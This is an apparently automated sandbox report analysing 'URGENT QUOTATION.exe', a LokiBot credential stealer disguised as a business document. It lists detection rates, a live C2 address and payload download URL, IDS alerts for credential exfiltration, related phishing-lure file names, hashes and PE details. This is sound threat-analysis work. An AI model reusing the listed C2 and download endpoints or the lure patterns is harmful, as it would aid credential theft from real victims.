Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection11	Masquerading1	OS Credential Dumping2	Security Software Discovery621	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion22	Credentials in Registry1	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Remote System Discovery1	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Information Discovery213	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
URGENT QUOTATION.exe	29%	Virustotal		Browse
URGENT QUOTATION.exe	48%	ReversingLabs	Win32.Trojan.Vebzenpak
URGENT QUOTATION.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://51.195.53.221/p.php/594QbwaP456AN	11%	Virustotal		Browse
http://51.195.53.221/p.php/594QbwaP456AN	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
onedrive.live.com	unknown	unknown	false		high
gnpnew.by.files.1drv.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://51.195.53.221/p.php/594QbwaP456AN	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?cid=604AA6C584DB9137&resid=604AA6C584DB9137%21123&authkey=ANCFnep	URGENT QUOTATION.exe, 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
51.195.53.221	unknown	France		16276	OVHFR	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356236
Start date:	22.02.2021
Start time:	19:54:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	URGENT QUOTATION.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.6% (good quality ratio 3.5%) Quality average: 59.9% Quality standard deviation: 16.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.113.196.254, 51.104.139.180, 13.107.3.254, 40.88.32.150, 104.42.151.234, 104.43.193.48, 184.30.21.144, 52.147.198.201, 13.64.90.137, 13.107.42.13, 13.107.42.12, 168.61.161.212, 8.248.115.254, 8.248.135.254, 8.253.207.121, 8.248.147.254, 8.248.139.254, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, odc-by-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, odc-by-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, s-ring.s-9999.s-msedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, odc-by-files-geo.onedrive.akadns.net, teams-ring.msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:55:27	API Interceptor	3x Sleep call for process: URGENT QUOTATION.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51.195.53.221	Payment Advice.PDF.exe	Get hash	malicious	Browse	51.195.53.221/p.php/UXzOJYiOV7I83
	PO#735086_pdf.exe	Get hash	malicious	Browse	51.195.53.221/p.php/TABGAUKhpT2hu
	Fk2R8VvodKESjNz.exe	Get hash	malicious	Browse	51.195.53.221/p.php/kdPYBLiWHt5e8
	bwNz5CvLWA.exe	Get hash	malicious	Browse	51.195.53.221/p.php/lJ606117cGKwY
	Original Invoice.exe	Get hash	malicious	Browse	51.195.53.221/p.php/9jOsfsOpZTcJM
	Shipping Details_PDF.exe	Get hash	malicious	Browse	51.195.53.221/p.php/7gEWZ4upg1lkl
	ar31Dwi59D2H6pJ.exe	Get hash	malicious	Browse	51.195.53.221/p.php/2dY9AG7m0LNWP
	SecuriteInfo.com.CAP_HookExKeylogger.25342.exe	Get hash	malicious	Browse	51.195.53.221/p.php/lJ606117cGKwY
	HSBC Payment.exe	Get hash	malicious	Browse	51.195.53.221/p.php/fA33po5ZHfzav
	Offer to Purchase.xlsx	Get hash	malicious	Browse	51.195.53.221/p.php/lJ606117cGKwY
	Offerte aanvragen#U00b7pdf.exe	Get hash	malicious	Browse	51.195.53.221/p.php/BXlnnQj8OAckh
	Shipping Details_PDF.exe	Get hash	malicious	Browse	51.195.53.221/p.php/7gEWZ4upg1lkl
	Original Invoice.exe	Get hash	malicious	Browse	51.195.53.221/p.php/NyO3EiWYgxXgy
	Dokumen BPN [030951966215000AUTOMATION24971775911039.PDF.exe	Get hash	malicious	Browse	51.195.53.221/p.php/UXzOJYiOV7I83
	XiBlptMzvr.exe	Get hash	malicious	Browse	51.195.53.221/p.php/lJ606117cGKwY
	Purchase Order RFQ-HL51L07.exe	Get hash	malicious	Browse	51.195.53.221/p.php/cfOoZYb0LXPms
	DHL.doc.exe	Get hash	malicious	Browse	51.195.53.221/p.php/2dY9AG7m0LNWP
	Letter(gift) Supplier_2021.pdf.exe	Get hash	malicious	Browse	51.195.53.221/p.php/UXzOJYiOV7I83
	DHL BILL OF LADING DOC.gz.exe	Get hash	malicious	Browse	51.195.53.221/p.php/dUQz9bwGRLNK7
	DHL_AWB 9804583234_pdf.exe	Get hash	malicious	Browse	51.195.53.221/p.php/TABGAUKhpT2hu

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	Subconract 504.xlsm	Get hash	malicious	Browse	37.187.115.122
	87BB0T225KLOI88U44D000DS2F4H414DD.vbs	Get hash	malicious	Browse	144.217.17.185
	leaseplan-invoice-831008_xls2.HtMl	Get hash	malicious	Browse	146.59.152.166
	(G0170-PF3F-20-0260)2T.exe	Get hash	malicious	Browse	188.165.242.45
	Booking Confirmation 02222021951 - copy -PDF.exe	Get hash	malicious	Browse	87.98.245.48
	SecuriteInfo.com.Exploit.Siggen3.10343.28053.xls	Get hash	malicious	Browse	198.50.187.46
	SecuriteInfo.com.Exploit.Siggen3.10343.28053.xls	Get hash	malicious	Browse	198.50.187.46
	Complaint_Letter_1212735678-02192021.xls	Get hash	malicious	Browse	87.98.239.40
	Complaint_Letter_1212735678-02192021.xls	Get hash	malicious	Browse	87.98.239.40
	Payment Advice.PDF.exe	Get hash	malicious	Browse	51.195.53.221
	DHL Shipment Notification 7465649870,pdf.exe	Get hash	malicious	Browse	142.44.136.34
	PO#735086_pdf.exe	Get hash	malicious	Browse	51.195.53.221
	Covid 19 bilgi y#U00f6netim sistemi.msi	Get hash	malicious	Browse	51.77.118.172
	ce-equinix_1.0.1.apk	Get hash	malicious	Browse	5.135.83.77
	KUmKV28Ffx.exe	Get hash	malicious	Browse	66.70.204.222
	c4p1vG05Z8.exe	Get hash	malicious	Browse	51.89.123.225
	KLunCDGm5W.exe	Get hash	malicious	Browse	167.114.145.33
	Fk2R8VvodKESjNz.exe	Get hash	malicious	Browse	51.195.53.221
	bwNz5CvLWA.exe	Get hash	malicious	Browse	51.195.53.221
	Original Invoice.exe	Get hash	malicious	Browse	51.195.53.221

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck Download File
Process:	C:\Users\user\Desktop\URGENT QUOTATION.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Users\user\Desktop\URGENT QUOTATION.exe
File Type:	data
Category:	dropped
Size (bytes):	966
Entropy (8bit):	0.6249317112532295
Encrypted:	false
SSDEEP:	3:/lbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbel/lh:4/g/g/g/g/g/g/g/g/g/g
MD5:	66C8E69AD8C2DC9BA8D6C3D08861DCDA
SHA1:	2343A74E50E837B6EDF8DE852BA32C6A2CFD820C
SHA-256:	08A7F0B78A47D3D7FB5383E527F5318E5C498D610225CC25C19A487C4CC27BCB
SHA-512:	E3143A110D10154EF7AB81C66D5A5DDB0EA2EB0C11E4FC2C919EF4B06E7E8BA4ACEEEB4653023C73327DD907F8E90C47DD8209305BF0678D022652CACB08735E
Malicious:	false
Reputation:	low
Preview:	........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.35081517066537
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	URGENT QUOTATION.exe
File size:	135168
MD5:	b49c71be94624173a9683580c792b195
SHA1:	4b78a8199129007580b91060db70ce44fe7278e5
SHA256:	8cf8f18fb85f0e190ff77fd57264cf9e31dd7128f1b4ad43713e128a6d68e867
SHA512:	4ef927a36965dca57cd852d50c987ca1b35cfee8487c2140c1f05611a5684ef32f1557eebf72fc54fa05589c6dce3c59de724240857a62e57ba9c996d4fb6999
SSDEEP:	1536:1cOz3NIR0xDg48LNL6RURm5TwtLXpaRCj5rEoUR:RZI0xQKUR/LXpaY1U
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bc..&..H&..H&..H...H'..Hi .H...H.$.H'..HRich&..H................PE..L....I.H..........................................@........

File Icon


Icon Hash:	0c695b5f13133b30

Static PE Info

General
Entrypoint:	0x4015d8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48AD4985 [Thu Aug 21 10:55:01 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	cf1699b617228992f3df7f1484e33d33

Entrypoint Preview

Instruction
push 00402760h
call 00007F270CC7A1E3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov al, D5h
fcomp qword ptr [esi+eax*8]
cmp dh, 00000040h
mov cl, A7h
sub esi, esp
test al, A7h
lds ebp, eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
popad
jo 00007F270CC7A266h
imul ebp, dword ptr [edi+6Eh], 70726F43h
outsd
jc 00007F270CC7A253h
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
or byte ptr [edi-5Ch], al
cld
jl 00007F270CC7A176h
aaa
jnp 00007F270CC7A23Dh
adc edx, 0ACEE40Ah
add cl, dh
push edi
lea ecx, dword ptr [ebp-41h]
jnp 00007F270CC7A225h
add al, 4Fh
mov eax, dword ptr [BA6B9014h]
mov ch, 06h
bound edi, dword ptr [edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cmpsd
adc byte ptr [eax], al
add byte ptr [0000000Fh], bl
push cs
add byte ptr [eax+65h], cl
insb
push 73736465h
imul ebp, dword ptr [edi+6Ch], 65h
outsb
add byte ptr [53000B01h], cl
je 00007F270CC7A253h
je 00007F270CC7A257h
arpl word ptr [edx+61h], si

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d3b4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b000	0x1288	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x128	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1c868	0x1d000	False	0.37255859375	data	5.68638281938	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1e000	0x1c820	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x3b000	0x1288	0x2000	False	0.26904296875	data	3.06652205631	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3b3e0	0xea8	data
RT_GROUP_ICON	0x3b3cc	0x14	data
RT_VERSION	0x3b0f0	0x2dc	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	MisterBreak
InternalName	constantinsborg
FileVersion	1.00
CompanyName	MisterBreak
LegalTrademarks	MisterBreak
Comments	MisterBreak
ProductName	Corpora
ProductVersion	1.00
OriginalFilename	constantinsborg.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/22/21-19:55:26.030114	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49743	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.030114	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.030114	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.030114	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49743	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.532301	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49744	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.532301	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.532301	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.532301	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49744	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.968569	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.968569	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.968569	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.4	51.195.53.221
02/22/21-19:55:26.968569	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.4	51.195.53.221
02/22/21-19:55:27.547797	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.4	51.195.53.221
02/22/21-19:55:27.547797	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.4	51.195.53.221
02/22/21-19:55:27.547797	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.4	51.195.53.221
02/22/21-19:55:27.547797	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.4	51.195.53.221
02/22/21-19:55:28.064710	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.4	51.195.53.221
02/22/21-19:55:28.064710	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.4	51.195.53.221
02/22/21-19:55:28.064710	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.4	51.195.53.221
02/22/21-19:55:28.064710	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.4	51.195.53.221
02/22/21-19:55:28.625081	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.4	51.195.53.221
02/22/21-19:55:28.625081	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.4	51.195.53.221
02/22/21-19:55:28.625081	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.4	51.195.53.221
02/22/21-19:55:28.625081	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.4	51.195.53.221
02/22/21-19:55:54.056209	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 19:55:25.982815981 CET	49743	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.025729895 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.025830984 CET	49743	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.030113935 CET	49743	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.072932959 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.073054075 CET	49743	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.115890980 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.303994894 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304028034 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304047108 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304064035 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304080009 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304097891 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304114103 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304119110 CET	49743	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.304131985 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304150105 CET	80	49743	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.304177999 CET	49743	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.304200888 CET	49743	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.304256916 CET	49743	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.486068964 CET	49744	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.528930902 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.529052973 CET	49744	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.532300949 CET	49744	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.575352907 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.575452089 CET	49744	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.618608952 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814730883 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814758062 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814770937 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814786911 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814804077 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814821005 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814836979 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814857006 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814876080 CET	80	49744	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.814933062 CET	49744	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.815023899 CET	49744	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.816253901 CET	49744	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.920228004 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.963185072 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:26.963323116 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:26.968569040 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.013710022 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.013936996 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.056998014 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275238037 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275314093 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275357962 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275397062 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275435925 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275448084 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.275479078 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275517941 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.275520086 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275552034 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.275563955 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.275614977 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.275707960 CET	80	49745	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.277110100 CET	49745	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.496277094 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.539612055 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.541325092 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.547796965 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.593133926 CET	80	49748	51.195.53.221	192.168.2.4
Feb 22, 2021 19:55:27.593444109 CET	49748	80	192.168.2.4	51.195.53.221
Feb 22, 2021 19:55:27.638089895 CET	80	49748	51.195.53.221	192.168.2.4
